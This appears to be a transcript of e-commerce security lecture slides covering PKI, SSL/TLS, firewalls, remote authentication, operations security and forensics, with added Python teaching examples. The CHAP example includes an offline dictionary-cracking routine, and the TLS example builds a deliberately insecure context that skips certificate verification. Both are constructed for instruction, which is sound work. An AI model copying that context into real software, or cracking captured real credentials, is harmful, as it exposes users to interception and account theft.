• CAs can be cross-certified by other CAs so that certificates from one domain are trusted in another
• Caveat: verification must also check validity dates, revocation status and that the certified name matches the party actually being contacted
Public Key Infrastructure
• Digital Certificates
• Certificate Authorities (CA)
• Registration Authorities (RA)
• Policies and procedures
• Certificate Revocation (CRLs, OCSP)
• Non-repudiation support
• Timestamping
• Lightweight Directory Access Protocol (LDAP) for certificate distribution
• Security-enabled applications
• Cross Certification
Key Escrow
• Allowing law enforcement to obtain the keys to view people's encrypted data
• Escrow the key in two pieces with two trusted escrow agents, so that neither agent alone can reconstruct it
• A court order is needed to obtain both pieces
• Clipper Chip (1993): the Skipjack cipher implemented in tamper-resistant hardware, with a Law Enforcement Access Field (LEAF) carrying the escrowed session key; a flaw in the LEAF checksum was demonstrated in 1994 and the scheme was abandoned
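The two-agent split on the slide above, as an added example that is not from the lecture. Two agents each holding one piece is the 2-of-2 case of Shamir's threshold scheme, and the code implements the general k-of-n form, so it also covers the 2-of-3 arrangement in which a lost or uncooperative agent does not lose the key; that generalisation goes beyond the slide. The escrowed key and the field prime are constructed for illustration.

```python
"""Splitting an escrowed key so that no single escrow agent can use it.

Added example, not from the lecture. The slide's two-agent scheme is the
2-of-2 case; this implements Shamir's threshold sharing, which also gives
k-of-n (e.g. 2-of-3 so a lost agent does not lose the key). The demo key is
a constructed 256-bit value; the field prime is the Mersenne prime 2^521-1.
"""
import secrets

P = 2 ** 521 - 1  # prime field; any secret below P can be shared


def split_secret(secret, threshold, n_shares):
    """Return n_shares points (x, f(x)) on a random polynomial of degree
    threshold-1 whose constant term is the secret."""
    if not 0 <= secret < P or not 1 <= threshold <= n_shares:
        raise ValueError("bad parameters")
    coeffs = [secret] + [secrets.randbelow(P) for _ in range(threshold - 1)]
    return [(x, sum(c * pow(x, i, P) for i, c in enumerate(coeffs)) % P)
            for x in range(1, n_shares + 1)]


def recover_secret(shares):
    """Lagrange interpolation at x = 0 from exactly `threshold` distinct
    shares. Fewer shares than the threshold reveal nothing about the secret."""
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num = den = 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % P
                den = den * (xi - xj) % P
        total = (total + yi * num * pow(den, -1, P)) % P
    return total


def escrow_key(key_bytes, threshold, agents):
    """Hand each escrow agent one share of a symmetric key."""
    return split_secret(int.from_bytes(key_bytes, "big"), threshold, agents)


def release_key(shares, key_len):
    """After the court order: combine the surrendered shares into the key."""
    return recover_secret(shares).to_bytes(key_len, "big")


DEMO_KEY = bytes(range(32))  # constructed 256-bit key, not a real one

if __name__ == "__main__":
    shares = escrow_key(DEMO_KEY, 2, 3)          # 2-of-3: three agents, any two suffice
    print("two agents:", release_key(shares[:2], 32) == DEMO_KEY)
    print("other two: ", release_key(shares[1:], 32) == DEMO_KEY)
```

A share on its own is a uniformly random field element, which is the property that makes the "court order for both pieces" rule meaningful: one agent, or one subpoena, learns nothing. Real escrow also has to bind each share to a key identifier and an authorization record, which this example leaves out.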
Key Management
• Key control
• Key recovery
• Key storage
• Key retirement/destruction
• Key change
• Key generation
• Key theft
• Frequency of key use
E-mail Security
• Non-repudiation
• Confidentiality of messages
• Authentication of source
• Verification of delivery
Secure Multipurpose Internet Mail
Extensions (S/MIME)
• Adds security services to messages in MIME format
• Provides authentication, integrity and non-repudiation through digital signatures, and confidentiality through encryption
• Message format follows the Public Key Cryptography Standards (PKCS #7 / CMS)
• Uses X.509 certificates for the signing and encryption keys, so it relies on a CA hierarchy
Pretty Good Privacy - PGP
• Written by Phil Zimmermann (1991)
• Symmetric cipher: originally IDEA (OpenPGP implementations now use AES and others)
• RSA is used for signatures and key distribution (the symmetric session key is sent encrypted under the recipient's public key)
• No CA: uses a "web of trust"
• Users can certify each other's keys by signing them
Secure Sockets Layer (SSL)
• Developed by Netscape in 1994 (SSL 2.0 shipped in 1995, SSL 3.0 in 1996)
• Uses a public-key certificate to authenticate the server to the client
• Also provides optional client-to-server authentication (client certificates)
• Historically supported RSA public-key algorithms with RC4, IDEA, DES and 3DES, and MD5/SHA-1 hashing; all of those ciphers and both hash functions are now obsolete
• HTTPS is HTTP carried over SSL/TLS, by default on port 443
• Resides between the application and the TCP layer
• Can be used by Telnet, FTP, HTTP, e-mail (SMTP, IMAP, POP) and other TCP-based protocols
• Certificates are X.509
• Transport Layer Security (TLS) is the successor to SSL; SSL 2.0/3.0 and TLS 1.0/1.1 are deprecated, and TLS 1.2 or 1.3 should be required
Outline
• EC Architectural Framework
• EC Security
– Basic Security Issues
– Security Incidences
– Attacking Web Applications
– Access Controls
– Securing EC Communications
– Securing EC Networks
– Operations Security
– Law, Investigation, and Ethics
OSI Security Services
• A security service is a collection of security mechanisms, files, and procedures that help protect the network.
– Authentication
– Access control
– Data confidentiality
– Data integrity
– Non-repudiation
– Logging and monitoring
OSI Security Mechanisms
• A security mechanism is a control that is implemented in order to provide the six basic security services.
– Encipherment (encryption and decryption)
– Digital signature
– Access control
– Data integrity
– Authentication
– Traffic padding
– Routing control
– Notarization
Application Layer Security
• SET – Secure Electronic Transaction
– Originated by Visa and MasterCard (1996) for card payments, with certificates for cardholder, merchant and payment gateway
– Was overtaken by SSL/TLS, which needed no client-side certificates
• S-HTTP – Secure HTTP
– Early standard (RFC 2660) for encrypting and signing individual HTTP messages
– Also overtaken by SSL/TLS; not to be confused with HTTPS, which is ordinary HTTP over SSL/TLS
• S/MIME – Secure Multipurpose Internet Mail Extensions
– E-mail encryption and digital signatures
Transport Layer Security
• SSH-2 – Secure Shell version 2
– Server and user authentication with public keys (RSA, ECDSA, Ed25519); OpenSSH can also issue its own certificates for hosts and users
– Supports authentication, compression, confidentiality and integrity
– Originally DES/3DES/Blowfish encryption; modern implementations use AES-GCM or ChaCha20-Poly1305
– Because SSH-2 supports authentication, compression, confidentiality and integrity, it is used frequently for encrypted file transfer (SFTP, SCP)
– Caveat: the first connection trusts the server's host key on sight unless it is pre-distributed or certified
• SSL – Secure Sockets Layer
– Contains the SSL Record Protocol and the SSL Handshake Protocol
– Uses symmetric encryption for the data and public-key cryptography for authentication and key establishment
– MAC – Message Authentication Code for integrity (HMAC; TLS 1.3 uses AEAD ciphers instead)
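The SSL slide earlier lists DES, 3DES, IDEA and MD5, and the Transport Layer Security slide above describes certificate authentication and the MAC; the following added example (not from the lecture; it uses only Python's standard ssl module and opens no network connection) shows what those choices mean for a client configuration today: a weak context of the kind written to make a failing connection "work", a hardened one, and an audit function that reports the difference. The two contexts and the audit checks are constructed for illustration.

```python
"""Checking a TLS client configuration against the obsolete choices the SSL
slides list (DES, 3DES, RC4, MD5, protocol versions below TLS 1.2, and no
certificate checks).

Added example, not from the lecture; it uses only Python's standard ssl module
and does not open a network connection. The 'weak' context is the kind of
configuration written to make a failing connection 'work'; the hardened one is
what an EC client should ship with.
"""
import ssl

WEAK_MARKERS = ("RC4", "DES", "MD5", "NULL", "EXP", "RC2")


def weak_context():
    """Disables certificate and hostname checks and asks for old protocol
    versions 'for compatibility'. Every line here is a finding."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False        # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE   # accepts any certificate: trivially MITM-able
    try:
        ctx.minimum_version = ssl.TLSVersion.TLSv1
    except ValueError:
        pass                          # this OpenSSL build has TLS 1.0 compiled out
    return ctx


def hardened_context(cafile=None):
    """Verify the server against trusted roots, check the hostname, require
    TLS 1.2+, and allow only forward-secret AEAD cipher suites."""
    ctx = ssl.create_default_context(cafile=cafile)  # CERT_REQUIRED + hostname check
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!MD5:!RC4:!3DES")
    return ctx


def audit_context(ctx):
    """Return the list of problems found in an SSLContext (empty means clean)."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate not verified")
    if not ctx.check_hostname:
        findings.append("hostname not checked against certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("protocol versions below TLS 1.2 allowed")
    weak = sorted({c["name"] for c in ctx.get_ciphers()
                   if any(m in c["name"] for m in WEAK_MARKERS)})
    if weak:
        findings.append("weak cipher suites enabled: " + ", ".join(weak))
    return findings


if __name__ == "__main__":
    print("weak:    ", audit_context(weak_context()))
    print("hardened:", audit_context(hardened_context()))
```

The first two findings matter most in practice: a client that does not verify the certificate gets all of SSL's confidentiality machinery and none of its authentication, so anyone on the path can terminate the connection and read the traffic. Which cipher names appear in the weak context depends on the installed OpenSSL; the audit reports whatever is actually enabled.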
Firewalls
• Packet Filtering Firewall - First Generation
– Screening router
– Operates at the network and transport layers
– Examines source and destination IP address, protocol and ports
– Can deny based on ACLs; first matching rule wins, with an implicit deny at the end
– Can specify port
– Stateless: judges every packet on its own, so return traffic for permitted connections needs its own (wide) permit rule, and spoofed or out-of-sequence packets that match a rule pass
• Application Level Firewall - Second Generation
– Proxy server
– Copies each packet from one network to the other (the client talks to the proxy, the proxy talks to the server)
– Masks the origin of the data
– Operates at layer 7 (application layer), so it can inspect and filter protocol content
– Reduces network performance since it has to analyze each packet and decide what to do with it
– Also called an application layer gateway
Firewalls (cont.)
• Stateful Inspection Firewalls – Third Generation
– Packets analyzed at all OSI layers
– Keeps a state table of connections, so a reply is permitted only if a matching outbound request was seen
– Queued at the network level
– Faster than an application level gateway
• Dynamic Packet Filtering Firewalls – Fourth Generation
– Allows modification of security rules on the fly
– Mostly used for UDP, which has no connection state of its own
– Remembers the UDP packets that have crossed the network's perimeter and decides on that basis whether to let the replies pass through the firewall
• Kernel Proxy – Fifth Generation
– Runs in the operating system kernel rather than as a user-space proxy (the original products ran in the Windows NT kernel)
– Uses dynamic and custom TCP/IP-based stacks to inspect the network packets and to enforce security policies
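The difference between the first and third generations above, as an added example that is not from the lecture: a three-rule policy evaluated first by a stateless filter and then by a stateful firewall that tracks TCP flows. The addresses, the policy and the packets are constructed. It shows that the stateless filter must drop the server's legitimate reply unless a broad "established" hole is added, and that it lets an ACK-only probe through while the stateful filter does not.

```python
"""Stateless packet filtering versus stateful inspection on a constructed policy.

Added example, not from the lecture. The addresses, the three-rule policy and
the packets are all constructed: 203.0.113.10 is a DMZ web server, 10.0.0.5 an
internal database, 198.51.100.7 an Internet client.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str
    sport: int
    dport: int
    syn: bool = False
    ack: bool = False


# First match wins; anything not matched is denied (implicit deny).
RULES = [
    ("permit", "0.0.0.0/0",      "203.0.113.10/32", "tcp", 443),   # Internet -> DMZ web
    ("permit", "203.0.113.0/24", "10.0.0.5/32",     "tcp", 5432),  # DMZ -> internal DB
    ("deny",   "0.0.0.0/0",      "10.0.0.0/8",      "any", None),  # nothing else into LAN
]


def stateless_filter(pkt, rules=RULES):
    """First-generation screening router: each packet is judged on its own
    header fields, with no memory of earlier packets."""
    for action, src, dst, proto, dport in rules:
        if (ip_address(pkt.src) in ip_network(src)
                and ip_address(pkt.dst) in ip_network(dst)
                and proto in ("any", pkt.proto)
                and dport in (None, pkt.dport)):
            return action
    return "deny"


class StatefulFirewall:
    """Third-generation stateful inspection: a new TCP flow must start with a
    SYN and pass the rule base; later packets are matched against the table."""

    def __init__(self, rules=RULES):
        self.rules = rules
        self.table = set()  # tracked flows as (proto, src, sport, dst, dport)

    def filter(self, pkt):
        fwd = (pkt.proto, pkt.src, pkt.sport, pkt.dst, pkt.dport)
        rev = (pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if fwd in self.table or rev in self.table:
            return "permit"  # part of an established flow (either direction)
        if pkt.proto == "tcp" and not (pkt.syn and not pkt.ack):
            return "deny"    # mid-stream packet with no state: ACK scan or spoofed reply
        if stateless_filter(pkt, self.rules) == "permit":
            self.table.add(fwd)  # remember the new flow
            return "permit"
        return "deny"


# Constructed traffic.
CLIENT_SYN = Packet("198.51.100.7", "203.0.113.10", "tcp", 51234, 443, syn=True)
SERVER_REPLY = Packet("203.0.113.10", "198.51.100.7", "tcp", 443, 51234, syn=True, ack=True)
ACK_SCAN = Packet("198.51.100.7", "203.0.113.10", "tcp", 40000, 443, ack=True)
WEB_TO_DB = Packet("203.0.113.10", "10.0.0.5", "tcp", 40001, 5432, syn=True)
INTERNET_TO_DB = Packet("198.51.100.7", "10.0.0.5", "tcp", 40002, 5432, syn=True)

if __name__ == "__main__":
    fw = StatefulFirewall()
    for name, pkt in [("client SYN", CLIENT_SYN), ("server reply", SERVER_REPLY),
                      ("ACK scan", ACK_SCAN), ("Internet -> DB", INTERNET_TO_DB)]:
        print(f"{name:15s} stateless={stateless_filter(pkt):6s} stateful={fw.filter(pkt)}")
```

The stateless filter's verdict on the server reply is the classic operational problem with first-generation devices: administrators "fix" it with a rule permitting all inbound TCP with the ACK bit set, which is exactly the hole the ACK scan exploits. The state table removes the need for that rule.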
Demilitarized Zone (DMZ)
(diagram only in the original slide; not reproduced in the transcript)
Virtual Private Networks
• PPTP – Point-to-Point Tunneling Protocol
– Works at the data link layer
– Single point-to-point connection from client to server
– Common with asynchronous (dial-up) connections on NT and Windows 95
– Its MS-CHAPv2 authentication and RC4 keying are broken; PPTP should no longer be used
• L2TP - Layer 2 Tunneling Protocol
– Combination of PPTP and the earlier Layer 2 Forwarding Protocol (L2F)
– Multiple protocols can be encapsulated within L2TP
– Single point-to-point connection from client to server
– Common with dial-up VPNs
– Provides no encryption of its own, so it is normally run over IPsec (L2TP/IPsec)
• IPsec
– Operates at the network layer
– Allows multiple and simultaneous tunnels
– Encrypts (ESP) and authenticates (AH or ESP) IP data; keys are negotiated with IKE
– Focuses more on network-to-network (site-to-site) connectivity, in tunnel or transport mode
Wireless Security
• WEP – Wired Equivalent Privacy – 64- or 128-bit keys, but RC4 with short, repeating IVs; broken since 2001 and recoverable in minutes
• WPA (Wi-Fi Protected Access) is more secure; WPA2 (AES-CCMP) and now WPA3 should be used, with 802.1X/EAP (WPA-Enterprise) rather than a shared passphrase where possible
• WAP - Wireless Access Point
• SSID – Service Set Identifier – network name
– Disabling SSID broadcast hides the name from casual users only; it is still visible in client probe traffic and is not a security control
• Use encryption, a VPN, treat the wireless segment as an external connection, and use directional antennas to limit coverage
Remote Node Security Protocols
• Password Authentication Protocol (PAP)
– Remote security protocol; provides identification and authentication
– Uses a static, replayable password for authentication (now considered weak)
– Does not encrypt the user ID or password: anyone on the path sees them
• Challenge Handshake Authentication Protocol (CHAP)
– Next evolution of PAP, with stronger authentication
– Non-replayable challenge/response: the server sends a random challenge and the peer answers with MD5(identifier || secret || challenge) (RFC 1994), so a captured response is useless against a new challenge
– Verifies the identity of the node, and can re-challenge periodically during the session
– Often used to enable network-to-network communication
– Commonly used by remote access servers and xDSL, ISDN and cable modems
– Caveats: the server must store the cleartext secret, and a captured challenge/response pair allows an offline dictionary attack on a weak secret; MS-CHAPv2 is broken outright
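The PAP and CHAP exchanges above, as an added example that is not from the lecture: a CHAP server that issues one-time challenges and verifies RFC 1994 responses, a PAP login for contrast, and the offline dictionary attack an eavesdropper can run on a captured CHAP exchange. The user, the secret, the wordlist and the captured traffic are constructed.

```python
"""PAP versus CHAP as message exchanges, and what an eavesdropper gets from each.

Added example, not from the lecture. CHAP responses follow RFC 1994
(MD5 over identifier || secret || challenge); the user, secret, wordlist and
captured traffic are constructed.
"""
import hashlib
import hmac
import secrets


def chap_response(identifier, secret, challenge):
    """RFC 1994 Response-Value = MD5(Identifier || secret || Challenge-Value)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapServer:
    def __init__(self, secrets_by_user):
        self.secrets = secrets_by_user  # CHAP needs the cleartext secret server-side
        self.pending = {}
        self.identifier = 0

    def challenge(self, user):
        """Fresh random challenge per attempt; this is what defeats replay."""
        self.identifier = (self.identifier + 1) & 0xFF
        chal = secrets.token_bytes(16)
        self.pending[user] = (self.identifier, chal)
        return self.identifier, chal

    def verify(self, user, identifier, response):
        ident, chal = self.pending.pop(user, (None, None))  # one challenge, one answer
        if chal is None or identifier != ident or user not in self.secrets:
            return False
        expected = chap_response(identifier, self.secrets[user], chal)
        return hmac.compare_digest(expected, response)


def pap_login(user, password):
    """PAP: the credential itself crosses the wire and replays as-is."""
    return user, password


def crack_chap(identifier, challenge, response, wordlist):
    """Offline dictionary attack on a captured CHAP exchange."""
    for guess in wordlist:
        if chap_response(identifier, guess, challenge) == response:
            return guess
    return None


def chap_session(server, user, secret):
    """One complete exchange; returns (accepted, captured exchange)."""
    ident, chal = server.challenge(user)       # server -> peer: Challenge
    resp = chap_response(ident, secret, chal)  # peer -> server: Response
    return server.verify(user, ident, resp), (ident, chal, resp)


# Constructed demo data
USER, SECRET = "alice", b"hunter2"
WORDLIST = [b"password", b"123456", b"hunter2", b"letmein"]

if __name__ == "__main__":
    srv = ChapServer({USER: SECRET})
    ok, captured = chap_session(srv, USER, SECRET)
    print("login:", ok)
    srv.challenge(USER)  # a new attempt gets a new challenge
    print("replay accepted:", srv.verify(USER, captured[0], captured[2]))
    print("offline crack:", crack_chap(*captured, WORDLIST))
```

The replay fails because both the identifier and the challenge differ on the second attempt, which is the non-replayable property the slide claims. The crack succeeds because MD5 is fast and the secret is a dictionary word: CHAP protects against replay, not against a weak secret or a server database leak.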
Remote Access Authentication System
• TACACS – Terminal Access Controller Access Control System (TCP)
• TACACS+ – Cisco's redesign (TCP port 49); encrypts the whole packet body, separates authentication, authorization and accounting, and supports two-factor authentication
• RADIUS – Remote Authentication Dial-In User Service (UDP ports 1812/1813); only the password field is obfuscated
TACACS
• Terminal Access Controller Access Control System
• Provides remote authentication and related services
• User passwords are administered in a central database rather than in individual routers
• A TACACS-enabled network device prompts for user name and static password
• The network device then queries the TACACS server to verify the password
• Does not support prompting for a password change or the use of dynamic tokens
TACACS+
• Terminal Access Controller Access Control System Plus
• Proprietary Cisco enhancement (not backward compatible with TACACS)
• Two-factor authentication
• Users can change their password
• Ability to use secure tokens
• Better audit trails (per-command authorization and accounting)
RADIUS
• Remote Authentication Dial-In User Service (RFC 2865)
• Offers similar benefits to TACACS+
• Often used as a stepping stone to TACACS+
• The RADIUS server holds the dynamic password and network service access information (network ACLs)
• RADIUS is a fully open protocol and can be customized for almost any security system
• Can be used with Kerberos and provides CHAP remote node authentication
• Caveat: only the User-Password attribute is hidden (MD5-based obfuscation with the shared secret); everything else is cleartext, and a weak shared secret can be brute-forced from captured packets
• Except that it does not work with:
– AppleTalk Remote Access Protocol (ARAP)
– NetBIOS Frame Protocol Control Protocol
– NetWare Asynchronous Services Interface (NASI)
– X.25 PAD connections
Honeypots
• Decoy systems (e.g., fake firewalls, routers, web servers, database servers) that look like production systems and appear to do real work, but exist only to be attacked; they are watched and studied as intrusions occur
• Because no legitimate user has a reason to touch them, any traffic to a honeypot is a high-fidelity alert, and the attacker's tools and methods can be recorded safely
• Caveat: isolate them so that a compromised honeypot cannot be used to reach real systems
Layered Security
(diagram only in the original slide; not reproduced in the transcript)
Outline
• EC Architectural Framework
• EC Security
– Basic Security Issues
– Security Incidences
– Attacking Web Applications
– Access Controls
– Securing EC Communications
– Securing EC Networks
– Operations Security
– Law, Investigation, and Ethics
Asset, Vulnerability, Threat
• Asset – anything that is a computer resource (e.g., software, data)
• Vulnerability – a weakness in a system that enables security to be violated (e.g., weak segregation of duties)
• Threat – an event that could cause harm by violating security (e.g., an operator abusing privileges); risk is the likelihood of a threat exploiting a vulnerability against an asset
CIA
• Confidentiality – operations controls (who may access what) affect the confidentiality of data
• Integrity – how well operations controls are implemented affects data integrity
• Availability – fault tolerance and the ability to recover
Controls and Protections
• Controls to protect hardware, software and
media from:
– Threats in an operating environment
– Internal and external intruders
– Operators inappropriately accessing
resources
Categories of Controls
• Preventative – prevent harmful occurrence
– Lower amount and impact of errors entering the
system
– Prevent unauthorized intruders from accessing the
system
• Detective – detect after harmful occurrence
– Track unauthorized transactions
• Corrective – restore after harmful occurrence
– Data recovery
Separation of Duties
• Assign different tasks to different personnel
• No single person can completely compromise a system
• Related to the concept of least privilege – the minimum privileges required to do one's job
• Secure systems - system administrator and security administrator must be different roles
• Highly secure systems - system administrator, security administrator, and enhanced operator must be different roles
System Administrator Functions
• Installing software
• Start up and shut down of the system
• Adding and removing users
• Performing backup and recovery
• Handling printers and queues
Security Administrator Functions
• Setting user clearances, initial passwords and other security characteristics for new users
• Changing security profiles for users
• Setting file sensitivity labels
• Setting security of devices
• Reviewing audit data
Least Privilege
• No access beyond job requirements
• Group level privileges for Operators
– Read Only
– Read /Write - usually copies of original data
– Access Change – make changes to original
data
Operation Controls
• Resource Protection
• Hardware Controls
• Software Controls
Resource Protection
• Protecting Resources from disclosure
alteration or misuse
– Hardware – routers, firewalls, computers,
printers
– Software – libraries, vendor software, OS
software
– Data Resource – backup data, user data, logs
Hardware Controls
• Hardware Maintenance
– Requires physical and logical access by support staff and vendors
– Supervision of vendors and maintenance; background checks
• Maintenance Accounts
– Disable maintenance accounts when not needed
– Change default passwords
• Diagnostic Port Control
– Specific ports for maintenance
– Should be blocked from external access
• Hardware Physical Controls – require locks and alarms
– Sensitive operator terminals
– Media storage rooms
– Server and communications equipment
– Modem pools and circuit rooms
Software Controls
• Anti-virus Management – prevent the download and execution of malware
• Software Testing – a formal, rigid software testing process
• Software Utilities – control of powerful utilities
• Safe Software Storage – prevent modification of software and of backup copies
• Backup Controls – test restoring from backups, not just taking them
Physical Protection
• Protection from physical access
– Hardware – routers, firewalls, computers, printers
– Software – libraries, vendor software, OS software
• Physical piggybacking (tailgating) – following an authorized person through a door
Monitoring and Audits
• Monitoring – problem identification and resolution
• Monitor for:
– Illegal software installation
– Hardware faults
– Error states
– Operational events
Penetration Testing
• Testing a network's defenses by using the same techniques as external intruders
– Scanning and probing – port scanners
– Demon dialing – war dialing for modems
– Sniffing – capturing data packets
– Dumpster diving – searching paper disposal areas
– Social engineering – the most common; get information simply by asking for it
• Caveat: requires written authorization and an agreed scope before any testing begins
Auditing
• IT Auditors Audit:
– Backup Controls
– System and Transaction Controls
– Data Library Controls
– Systems Development Standards
– Data Center Security
– Contingency Plans
Audit Trails
• Enable tracking of the history of modifications, deletions and additions
• Allow for accountability
• Audit logs should record:
– Transaction time and date
– Who processed the transaction
– Which terminal was used
– Various security events relating to the transaction
• Logs are themselves a target: protect them from modification and deletion (forward to a separate log server, add integrity protection) and review them regularly
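The record fields above, as an added example that is not from the lecture: an audit log whose records carry the fields the slide lists, each protected by an HMAC and chained to the previous record's hash, so that editing, reordering or truncating the log is detectable. The key and the three sample transactions are constructed; in practice the key, or at least the chain head, would live on a separate log server rather than beside the log it protects.

```python
"""Tamper-evident audit trail: each record carries an HMAC and the hash of the
previous record, so edits, deletions and reordering are detectable.

Added example, not from the lecture. The record fields are the ones the slide
lists (time, user, terminal, event); the key and the sample entries are
constructed, and in practice the key (or the chain head) would live on a
separate log server, not beside the log it protects.
"""
import hashlib
import hmac
import json

GENESIS = b"\x00" * 32


class AuditLog:
    def __init__(self, key):
        self.key = key
        self.entries = []     # list of (record dict, tag hex)
        self.head = GENESIS   # hash of the latest record; publish/forward this

    def append(self, when, who, terminal, event):
        record = {"seq": len(self.entries), "time": when, "user": who,
                  "terminal": terminal, "event": event, "prev": self.head.hex()}
        body = json.dumps(record, sort_keys=True).encode()
        tag = hmac.new(self.key, body, hashlib.sha256).digest()
        self.entries.append((record, tag.hex()))
        self.head = hashlib.sha256(body + tag).digest()


def verify_chain(entries, key, expected_head=None):
    """Return None if the chain is intact, otherwise the index of the first bad
    record; len(entries) means records were removed from the end."""
    prev = GENESIS
    for i, (record, tag_hex) in enumerate(entries):
        if record.get("seq") != i or record.get("prev") != prev.hex():
            return i  # reordered, inserted or re-parented record
        body = json.dumps(record, sort_keys=True).encode()
        tag = hmac.new(key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, bytes.fromhex(tag_hex)):
            return i  # record contents changed after it was written
        prev = hashlib.sha256(body + tag).digest()
    if expected_head is not None and prev != expected_head:
        return len(entries)  # tail of the log is missing
    return None


KEY = b"constructed-audit-key"


def build_demo_log():
    """Three constructed transactions, as an operator's day might log them."""
    log = AuditLog(KEY)
    log.append("2024-03-01T09:00:00Z", "alice", "TERM01", "login")
    log.append("2024-03-01T09:05:12Z", "alice", "TERM01", "transfer 10.00 to acct 4471")
    log.append("2024-03-01T09:06:40Z", "bob", "TERM07", "privilege change: alice -> operator")
    return log


if __name__ == "__main__":
    log = build_demo_log()
    print("intact:", verify_chain(log.entries, KEY, log.head))
    log.entries[1][0]["user"] = "bob"  # an insider rewrites who moved the money
    print("first bad record:", verify_chain(log.entries, KEY, log.head))
```

Without the published head, deleting the newest records is undetectable, which is why the head (or a signed copy of the log) has to leave the machine as soon as each record is written. This is also what makes the log usable as evidence: an investigator can show that the record produced in court is the one written at the time.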
Illegal Computer Operations
• Eavesdropping – sniffing, dumpster diving,
social engineering
• Fraud – collusion, falsified transactions
• Theft – information or trade secrets, physical
hardware and software theft
• Sabotage – Denial of Service (DoS), production
delays
• External Attacks – malicious cracking, scanning,
war dialing
Outline
• EC Architectural Framework
• EC Security
– Basic Security Issues
– Security Incidences
– Attacking Web Applications
– Access Controls
– Securing EC Communications
– Securing EC Networks
– Operations Security
– Law, Investigation, and Ethics
Computer Crimes
• Crimes against the computer
• Crimes using a computer
Most Common Crimes
• Denial of Service (DoS)
• Theft of passwords
• Network intrusions
• Emanation eavesdropping
• Social engineering
• Illegal content (e.g., pornography)
• Fraud – using a computer to perpetrate crimes, e.g., auctions of non-existent merchandise
• Software piracy
• Dumpster diving
• Malicious code
• Spoofing of IP addresses
• Information warfare – attacking the infrastructure of a nation, including the military and the power grid
• Destruction or alteration of information
• Use of readily available attack scripts – "script kiddies", unskilled users
• Masquerading
• Embezzlement – illegally acquiring funds
• Data diddling – unauthorized modification of data
• Terrorism
Intellectual Property Law
• Patent – provides the owner a legally enforceable right to exclude others for a specified time (U.S.: 20 years from filing; formerly 17 years from grant)
• Copyright – protects original works of authorship; can be used for software and databases
• Trade Secret – secures confidentiality of proprietary technical and business-related information
– The company must meet requirements:
• Invested resources to develop the information
• Valuable to the business
• Valuable to a competitor
• Non-obvious information
• Trademark – establishes a word, name, symbol, color or sound used to identify and distinguish goods
Information Privacy Laws
• Intent varies widely from country to country
• European Union - has developed more protective laws for individual privacy (now the GDPR)
– Transfer of personal data from the EU to the US is prohibited unless equivalent protections are in place (an adequacy decision or approved contractual safeguards)
Electronic Monitoring
• Keystroke monitoring, e-mail monitoring,
surveillance cameras, badges and magnetic
card keys all allow monitoring of individuals.
• Key to monitoring: Must be done in a lawful
manner in a consistent fashion
E-mail monitoring
• Inform users that all e-mail is being monitored by displaying a log-on banner
– The banner should state that logging on to the system constitutes consent to being monitored, that unauthorized access is prohibited, and that violators are subject to prosecution
• Ensure monitoring is uniformly applied
• Explain acceptable use
• Explain who can read e-mail and how long it is backed up
• No guarantee of privacy
Computer Forensics
• Collecting information from and about computer
systems that is admissible in a court of law.
Evidence Life Cycle
• Discovery and recognition
• Protection
• Recording
• Collection
– Collect all relevant storage media
– Capture volatile data (memory, running processes, network connections) before removing power, since it is lost on shutdown; then image the storage media bit-for-bit through a write blocker and record a cryptographic hash of the image
– Photograph or print out the screen
– Avoid degaussing equipment and other magnetic sources
• Identification (tagging and marking)
• Preservation
– Protect from magnetic erasure
– Store in a proper environment
• Transportation
• Presentation in court
• Return to the evidence owner
• Maintain a chain-of-custody record at every step
Conducting the Investigation
• Corporate investigation should include Management,
corporate security, Human Resources, legal department
and other appropriate staff.
• Committee should be set up before hand to address the
following issues:
– Establishing liaison with law enforcement
– Deciding when and if to bring in law enforcement (FBI and
Secret Service)
– Setting up means of reporting computer crimes
– Establishing procedures for handling reports of computer crimes
– Planning and conducting investigations
– Involving senior management and corporate security, Human
Resources, the legal dept.
– Ensuring proper collection of evidence
Good Sources of Evidence
• Telephone records
• Video cameras
• Audit trails
• System logs
• System backups
• Witnesses
• Results of surveillance
• E-mails
MOM
• Motive
• Opportunity
• Means
Interview
• If interviewing do not give information
away to suspect
• Questions should be scripted
• Don’t use original documents in the
interview
Questions?